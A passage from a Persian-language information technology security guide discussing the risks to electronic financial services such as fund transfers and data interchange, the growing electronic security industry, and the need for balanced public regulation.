‫ﺟﻬﺎﻥ ﺑﺮﺍﻱ ﺭﻓﻊ ﺍﻳﻦ ﻧﮕﺮﺍﻧﻴﻬﺎ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﻧﺪ ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪١٢٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺧﻠـﻲ‬
‫ﻭ ﺧﺎﺭﺟﻲ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺖ ﻛﻪ ﺳﻄﺢ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﺮ ﻓﻌﺎﻟﻴﺖ ﺑﺎﻳﺪ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﺍﺭﺯﺵ ﺁﻥ ﻓﻌﺎﻟﻴﺖ ﺑﺎﺷﺪ؛‬
‫ﺑﻨــﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴــﺖ ﺑــﺮﺍﻱ ﺗﺮﺍﻛﻨــﺸﻬﺎ ﻭ ﻣﻌــﺎﻣﻼﺕ ﻣﻬــﻢ ﺑﺎﻳــﺪ ﺩﺭ‬
‫ﺳﻄﺤﻲ ﺑﺎﻻﺗﺮ ﺍﺯ ﺗﺮﺍﻛﻨﺸﻬﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﻋﺎﺩﻱ ﺗﺄﻣﻴﻦ ﺷﻮﺩ‪.‬‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻳﻚ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪﻱ ﻧﻴﺰ‬
‫ﺑﻮﺟــﻮﺩ ﻣــﻲﺁﻭﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻳﻬــﺎ ﻫــﺮ ﺭﻭﺯ ﮔــﺴﺘﺮﺩﻩﺗــﺮ‬
‫ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻟﺬﺍ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷﺎﻳـﺴﺘﺔ ﺗﻮﺟـﻪ‬
‫ﺑﻴﺸﺘﺮﻱ ﺍﺳﺖ‪.‬‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺑﻜـﺎﺭ ﺑـﺮﺩﻥ ﻭﺳـﺎﻳﻞ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﺍﻧﺘﻘـﺎﻝ ﻋﻼﺋـﻢ ﻭ ﺍﺳـﻨﺎﺩ‬
‫ﺍﻋﺘﺒﺎﺭﻱ‪ ،‬ﻭ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭ ﺳﺘﺪ ﺩﺭ ﻳﻚ ﻣﺤـﻴﻂ ﺗﺠـﺎﺭﻱ‪ .‬ﺧـﺪﻣﺎﺕ‬
‫ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﺟﺰﺀ ﭘﺎﻳﻪﺍﻱ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ‪:‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪٢٤(EFTs‬؛‬
‫ﺗﺒﺎﺩﻝ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪٢٥(EDI‬؛‬
‫ﺍﻧﺘﻘﺎﻝ ﻣﻨﺎﻓﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪٢٦(EBTs‬؛ ﻭ‬
‫ﺗﺼﺪﻳﻖ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪.٢٧(ETCs‬‬
‫ﺍﮔﺮﭼﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳـﻚ ﻓﺮﺻـﺖ ﺑـﺰﺭﮒ ﺟﻬـﺖ‬
‫ﮔﺴﺘﺮﺵ ﺗﺠﺎﺭﺕ ﺑﺮﺍﻱ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪،‬‬
‫ﺍﻣﺎ ﭼﻨﺪ ﻣﺨﺎﻃﺮﺓ ﺟﺪﻱ ﻧﻴﺰ ﺑﺪﻧﺒﺎﻝ ﺩﺍﺭﺩ‪ .‬ﺗﻤﺎﻡ ﭼﻬﺎﺭ ﺟﺰﺀ ﺧﺪﻣﺎﺕ‬
‫ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣـﺴﺘﻌﺪ ﻛﻼﻫﺒـﺮﺩﺍﺭﻱ‪ ،‬ﺳـﺮﻗﺖ‪ ،‬ﺍﺧـﺘﻼﺱ‪ ،‬ﻭ‬
‫ﺩﺳﺘﻜﺎﺭﻱ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻴﺸﺘﺮ ﺟـﺮﺍﺋﻢ ﺗﺠـﺎﺭﻱ ﻛـﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺥ‬
‫ﻣﻲﺩﻫﻨﺪ ﺗﺎﺯﮔﻲ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺭﻧﺪ ‪ -‬ﻛﻼﻫﺒﺮﺩﺍﺭﻱ‪ ،‬ﺳـﺮﻗﺖ‪ ،‬ﺟﻌـﻞ‬
‫ﻫﻮﻳﺖ‪ ،‬ﻭ ﺍﺧﺎﺫﻱ ﺳﺎﻟﻬﺎﺳﺖ ﻛﻪ ﺻﻨﺎﻳﻊ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺑﻪ ﺳﺘﻮﻩ‬
‫ﺁﻭﺭﺩﻩﺍﻧﺪ ‪ -‬ﺍﻣﺎ ﺑـﺎ ﺍﻳﻨﻬﻤـﻪ‪ ،‬ﭘﻴـﺸﺮﻓﺖ ﻓﻨـﺎﻭﺭﻱ ﻫﻤـﻮﺍﺭﻩ ﺑﺎﻋـﺚ‬
‫ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﺍﺑﻌﺎﺩ ﺟﺪﻳﺪﻱ ﻣﻲﮔـﺮﺩﺩ ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻋﻤﻖ ﻭ ﺩﺍﻣﻨﺔ ﺟﺮﺍﺋﻢ ﺭﺍ ﮔﺴﺘﺮﺩﻩﺗﺮ ﻛﻨﺪ‪ .‬ﻓﻨﺎﻭﺭﻱ ﺑﺎﻋﺚ ﻣﻲﺷـﻮﺩ‬
‫ﺟﻨﺎﻳﺘﻬﺎﻱ ﺑﺴﻴﺎﺭ ﮔﺴﺘﺮﺩﻩ ﻭ ﭘﻴﭽﻴﺪﻩ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺴﺮﻋﺖ ﻭ ﺑـﺼﻮﺭﺕ‬
‫ﮔﻤﻨﺎﻡ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ‪ .‬ﺩﺭ ﮔﺬﺷﺘﻪ ﺳﺮﻗﺖ ‪ ۵۰,۰۰۰‬ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ‬
‫ﺑﺮﺍﻱ ﺟﻨﺎﻳﺘﻜﺎﺭﺍﻥ ﺑﺴﻴﺎﺭ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻣﺎﻫﻬﺎ ﻳﺎ ﺣﺘﻲ ﺳﺎﻟﻬﺎ ﺯﻣـﺎﻥ‬
‫ﻣﻲﺑﺮﺩ؛ ﺍﻣﺎ ﺍﻣﺮﻭﺯ ﻳﻚ ﻣﺠﺮﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕـﺎﻥ ﺩﺭ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻧﻔﻮﺫ ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﻫـﺎﻱ ﻫﻮﻳـﺖ‪،‬‬
‫‪Electronic Funds Transfers‬‬
‫‪Electronic Data Interchange‬‬
‫‪Electronic Benefits Transfers‬‬
‫‪Electronic Trade Confirmations‬‬
‫‪24‬‬
‫‪25‬‬
‫‪26‬‬
‫‪27‬‬
‫ﻫﻤﺎﻥ ﺗﻌﺪﺍﺩ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﺩﺭ ﺗﻨﻬﺎ ﭼﻨـﺪ ﺛﺎﻧﻴـﻪ ﺑـﻪ ﺳـﺮﻗﺖ‬
‫ﺑﺒﺮﺩ‪.‬‬
‫ﺑﺮ ﺍﺳﺎﺱ ﺑﺮﺭﺳﻴﻬﺎﻱ ﺍﺧﻴﺮ ﺗﺨﻤـﻴﻦ ﺯﺩﻩ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ‪ %۵۷‬ﺍﺯ‬
‫ﺣﻤﻼﺕ ﻧﻔﻮﺫ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﻣـﺎﻟﻲ‬
‫ﺷﺮﻭﻉ ﺷﺪﻩ ﺑﻮﺩﻧﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﺨﻠﻔﺎﺕ ﻧﻈﻴﺮ ﻳـﻚ ﻣـﻮﺭﺩ ﺟـﺪﻱ‬
‫ﻛﻪ ﺩﺭ ﻭﺯﺍﺭﺕ ﺧﺰﺍﻧـﻪﺩﺍﺭﻱ ﺁﻣﺮﻳﻜـﺎ ﺭﺥ ﺩﺍﺩ ﻧﺎﺷـﻲ ﺍﺯ ﺍﺷـﺘﺒﺎﻩ ﺩﺭ‬
‫ﭘﻴــﺎﺩﻩﺳــﺎﺯﻱ ﺭﻭﻧــﺪﻫﺎﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﻣﺨــﺎﻃﺮﻩ ﻭ ﺑﻜــﺎﺭﮔﻴﺮﻱ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺁﻣـﺎﺩﻩ ﺑـﺪﻭﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻫـﺎﻱ‬
‫ﭼﻨﺪﻻﻳــﺔ ﺍﻣﻨﻴﺘــﻲ ‪ -‬ﻣــﻮﺍﺭﺩﻱ ﭼــﻮﻥ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻛﺎﺭﻛﻨــﺎﻥ‪،‬‬
‫ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣـﻨﻈﻢ ﺍﺑـﺰﺍﺭ ﻓﻨـﻲ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﺎﻧﻨﺪ ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ‪ ٢٨‬ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ‪ - ٢٩‬ﺑﻮﺩﻧـﺪ‪.‬‬
‫ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺍﺧﺒﺎﺭ ﺁﻥ ﺑﻪ ﺭﺳﺎﻧﻪﻫﺎ ﻧﻴﺰ ﺭﺍﻩ ﭘﻴﺪﺍ‬
‫ﻛﺮﺩ ﻃﻴﻔﻲ ﺷﺪ ﻛﻪ ﻳﻜﺴﻮﻱ ﺁﻥ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺷﻬﺮﺕ ﻭ ﺍﻋﺘﺒـﺎﺭ‬
‫ﻣﺎﻟﻲ ﻭ ﺳﻮﻱ ﺩﻳﮕﺮ ﺁﻥ ﺗﻐﻴﻴﺮ ﺭﻓﺘﺎﺭ ﻧﻬﺎﻥ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ‬
‫ﺩﺍﺩ ﻭ ﺳﺘﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻮﺩ؛ ﻭ ﺍﻳﻦ ﻫﻤﻪ ﺩﻟﻴﻠﻲ ﻧﺪﺍﺷﺖ ﺟﺰ ﻋـﺪﻡ‬
‫ﺍﻋﺘﻤﺎﺩ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﻭﺍﺳـﻄﻪﻫـﺎﻱ ﺗﺠـﺎﺭﺕ ﻭ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪.‬‬
‫ﺍﻗﺘﺼﺎﺩ ﺷﺒﻜﻪﺍﻱ‪ ،‬ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺛﺮﻭﺕ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻧﺠﺎﻡ ﺳﺮﻗﺖ ﻭ‬
‫ﺗﺨﺮﻳﺐ‪ ،‬ﻓﺮﺻﺘﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭ ﺑﺮﺭﺳﻲ ﻣﺰﺍﻳـﺎ ﻭ‬
‫ﻣﻌﺎﻳﺐ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ‪ ،‬ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻭ ﺗﺼﻤﻴﻤﮕﻴﺮﺍﻥ ﺑﺎﻳـﺪ ﺁﮔـﺎﻫﻲ‬
‫ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣـﻮﺭﺩ ﻧﻘـﺸﻲ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺗـﻀﻤﻴﻦ‬
‫ﺩﺍﺩ ﻭ ﺳﺘﺪﻫﺎﻱ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺗﺠﺎﺭﻱ ﺑﺎﺯﻱ ﻣـﻲﻛﻨـﺪ ﺍﻓـﺰﺍﻳﺶ‬
‫ﺩﻫﻨﺪ‪.‬‬
‫ﺻــﻨﻌﺖ ﺍﻣﻨﻴــﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺩﺭﺣــﺎﻝ ﺭﺷــﺪ ﻭ‬
‫ﺟﻬﺎﻧﻲﺷﺪﻥ ﺍﺳﺖ؛ ﻟﺬﺍ ﭼﺎﻟﺸﻬﺎﻱ ﺳﻴﺎﺳﺖ ﻋﻤـﻮﻣﻲ‬
‫ﺭﺍ ﺩﺭ ﺣﻮﺯﻩﻫﺎﻱ ﺳﻴﺎﺳﺖ ﺭﻗﺎﺑﺘﻲ‪ ،‬ﺗﻌﺎﺭﺿﻬﺎﻱ ﺑـﺎﻟﻘﻮﺓ‬
‫ﻣﻨﺎﻓﻊ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺩﺭ ﮔﺬﺷــﺘﺔ ﻧﺰﺩﻳــﻚ ﺷــﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋــﻪﺩﻫﻨــﺪﺓ ﺧــﺪﻣﺎﺕ ﺍﻣﻨﻴــﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﻤﻮﻣﹰﺎ ﺩﺭ ﺳﻪ ﺣﻮﺯﻩ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﺮﺩﻧـﺪ‪ :‬ﺩﺳﺘﺮﺳـﻲ‪،‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ‪ ،‬ﻭ ﺍﺭﺯﻳﺎﺑﻲ‪ .‬ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳﻨﻬـﺎ‪ ،‬ﺻـﻨﻌﺖ ﺍﻣـﺮﻭﺯﻱ ﺷـﺎﻣﻞ‬
‫ﺷﺮﻛﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺧﺪﻣﺎﺗﻲ ﺩﻳﮕـﺮ ﻧﻴـﺰ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺍﺭﺍﺋـﻪ‬
‫ﻣــﻲﻛﻨﻨــﺪ؛ ﺧــﺪﻣﺎﺗﻲ ﺍﺯ ﻗﺒﻴــﻞ ﻧﻈــﺎﺭﺕ ﻭ ﻏﺮﺑــﺎﻝ ﻛــﺮﺩﻥ ﺩﺍﺩﻩ‪،‬‬
‫ﻣﻬﺎﺟﻢﻳﺎﺑﻲ‪ ،‬ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ‪ ،‬ﺁﺯﻣﻮﻧﻬـﺎﻱ ﻧﻔﻮﺫﭘـﺬﻳﺮﻱ ﺑـﺮﺍﻱ‬
‫ﺑﺮﺭﺳﻲ ﻣﻴـﺰﺍﻥ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺳـﺨﺖﺍﻓﺰﺍﺭﻫـﺎ‪،‬‬
‫‪Virus Scanners‬‬
‫‪Firewalls‬‬
‫‪28‬‬
‫‪29‬‬
‫‪١٢٩‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ‪ ،‬ﺧـﺪﻣﺎﺕ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺑﻮﺳـﻴﻠﺔ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﻧﺸﺎﻧﻬﺎ‪ ،‬ﻛﻠﻴـﺪﻫﺎ ﻭ ﻳـﺎ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺯﻳـﺴﺘﻲ؛ ﻛـﻪ‬
‫ﻫﻤﮕــﻲ ﻫﻮﻳــﺖ ﮔﺮﻭﻫﻬــﺎ ﻳــﺎ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫــﺎ ﺭﺍ ﺗــﺼﺪﻳﻖ‬
‫ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻋﻼﻭﻩ ﺑﺮ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺠﻢ ﻗﺎﺑﻞ‬
‫ﺗﻮﺟﻬﻲ ﺍﺯ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻓﻲﻣﺎﺑﻴﻦ ﻋﺮﺿـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﻧﻴﺰ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺷﺮﻛﺘﻬﺎ ﺷﺎﻣﻞ ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ‪ISP ،٣٠‬ﻫـﺎ ﻭ ﺍﺭﺍﺋـﻪﺩﻫﻨـﺪﮔﺎﻥ‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺕ ﺩﺭ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺟﺪﻳـﺪ‬
‫ﻻ ﺑﻌﻨـﻮﺍﻥ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﻛﻠﻴـﺪﻱ ﺧـﺪﻣﺎﺕ ﻛﻮﺗـﺎﻩﻣـﻮﺝ‪،‬‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺎﻫﻮﺍﺭﻩ ﻭ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﻓﻌﺎﻟﻴﺖ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺧﺪﻣﺎﺕ ﻣﻴﺰﺑﺎﻧﻲ‪ ،‬ﺧﺪﻣﺎﺕ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﻭ ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﺧﺪﻣﺎﺕ‬
‫ﺯﻳﺮﺑﻨﺎﻳﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻧﻴﺰ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ‪.‬‬
‫ﻲ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‪،‬‬
‫ﺩﺭ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ‬
‫ﻣﻨﺎﻓﻊ ﻋﻤﻮﻣﻲ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺩﺭ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳـﺪ ﻣﻴـﺎﻥ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻭ‬
‫ﻣﺴﺎﺋﻠﻲ ﻧﻈﻴﺮ ﻫﺰﻳﻨﻪ‪ ،‬ﻛﻴﻔﻴﺖ ﺧﺪﻣﺎﺕ‪ ،‬ﻭ ﻧﻮﺁﻭﺭﻱ ﺑـﻪ‬
‫ﻳﻚ ﺗﻮﺍﺯﻥ ﻣﻌﻘـﻮﻝ ﺭﺳـﻴﺪ ﻭ ﺩﺭ ﺗـﺪﻭﻳﻦ ﺿـﻮﺍﺑﻂ ﻭ‬
‫‪Hosting Companies‬‬
‫‪30‬‬
‫ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﻻﺯﻣﺔ ﺭﻓـﺎﻩ‪ ،‬ﺁﺳـﺎﻳﺶ ﻭ ﺳـﻼﻣﺖ‬
‫ﻋﻤﻮﻣﻲ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻣﺪ ﻭ ﺍﺯ ﺍﻳﻨﺮﻭ ﻳﻚ ﺟـﺰﺀ ﺍﺻـﻠﻲ ﺿـﻮﺍﺑﻂ‬
‫ﺁﻥ‪ ،‬ﺗﻮﺳﻌﺔ ﺧﺪﻣﺎﺕ ﺑﻪ ﻣﻨﻈﻮﺭ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻡ ﺑﻮﺩ‪ .‬ﺍﻣـﺎ ﺩﺭﺣـﺎﻝ‬
‫ﺣﺎﺿـﺮ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺧـﺪﻣﺎﺕ ﺍﻭﻟﻴــﺔ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻳﻚ ﺿﺮﻭﺭﺕ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﺍﺯ ﻟﺤﺎﻅ ﺗﺎﺭﻳﺨﻲ‪ ،‬ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ ﻣﻨﻄـﻖ‬
‫ﺿﺎﺑﻄﻪﻣﻨﺪ ﺷﺪﻩ ﻛﻪ ﺩﺭ ﻧﻘـﻞ ﻭ ﺍﻧﺘﻘـﺎﻻﺕ ﻣـﻨﻈﻢ ﻛـﺎﻻ ﻭ ﭘـﻮﻝ‪،‬‬
‫ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺑﺎﻻﺗﺮﻳﻦ ﻣﻴﺰﺍﻥ ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ؛ ﻭ‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻧﻴﺎﺯﻣﻨﺪ ﺍﻋﺘﻤﺎﺩ ﻣﺮﺩﻡ ﻫـﺴﺘﻨﺪ‪،‬‬
‫ﺑﺎﻳﺪ ﻓﻌﺎﻟﻴﺖ ﺧﻮﺩ ﺭﺍ ﺳﺎﻟﻢ‪ ،‬ﻣﻨﻄﻘﻲ‪ ،‬ﻭ ﻣﺤﺘﺎﻃﺎﻧﻪ ﭘﻴﺶ ﺑﺒﺮﻧـﺪ‪ .‬ﺑـﺎ‬
‫ﻧﺰﺩﻳﻚﺷـﺪﻥ ﺻـﻨﻌﺖ ﻣﺨـﺎﺑﺮﺍﺕ ﻭ ﺑﺨـﺶ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺑـﻪ‬
‫ﻳﻜﺪﻳﮕﺮ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺍﻫﻤﻴﺖ ﻭ ﺿﺮﻭﺭﺕ ﺍﻳﺠـﺎﺩ ﺳﻴﺎﺳـﺖ‬
‫ﻋﻤﻮﻣﻲ ﻭ ﻣﻘﺮﺭﺍﺕ ﺁﮔﺎﻫﺎﻧﻪ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺑﻴﺸﺘﺮ ﻣﻲﺷﻮﺩ ﺗﺎ ﺗﻀﻤﻴﻦ‬
‫ﻛﻨﺪ ﻛﻪ ﺩﻭﻟﺖ‪ ،‬ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻣﺮﺩﻡ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﺧﻮﺩ ﺍﺯ ﺧﺪﻣﺎﺕ ﺍﻳﻤﻦ ﻣﺎﻟﻲ ﺭﺍ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ‪.‬‬
‫ﺩﺭ ﺗﻬﻴــﺔ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻋﻤــﻮﻣﻲ ﺑــﻪ ﻣﻨﻈــﻮﺭ ﺍﻳﺠــﺎﺩ ﻳــﺎ ﺍﺻــﻼﺡ‬
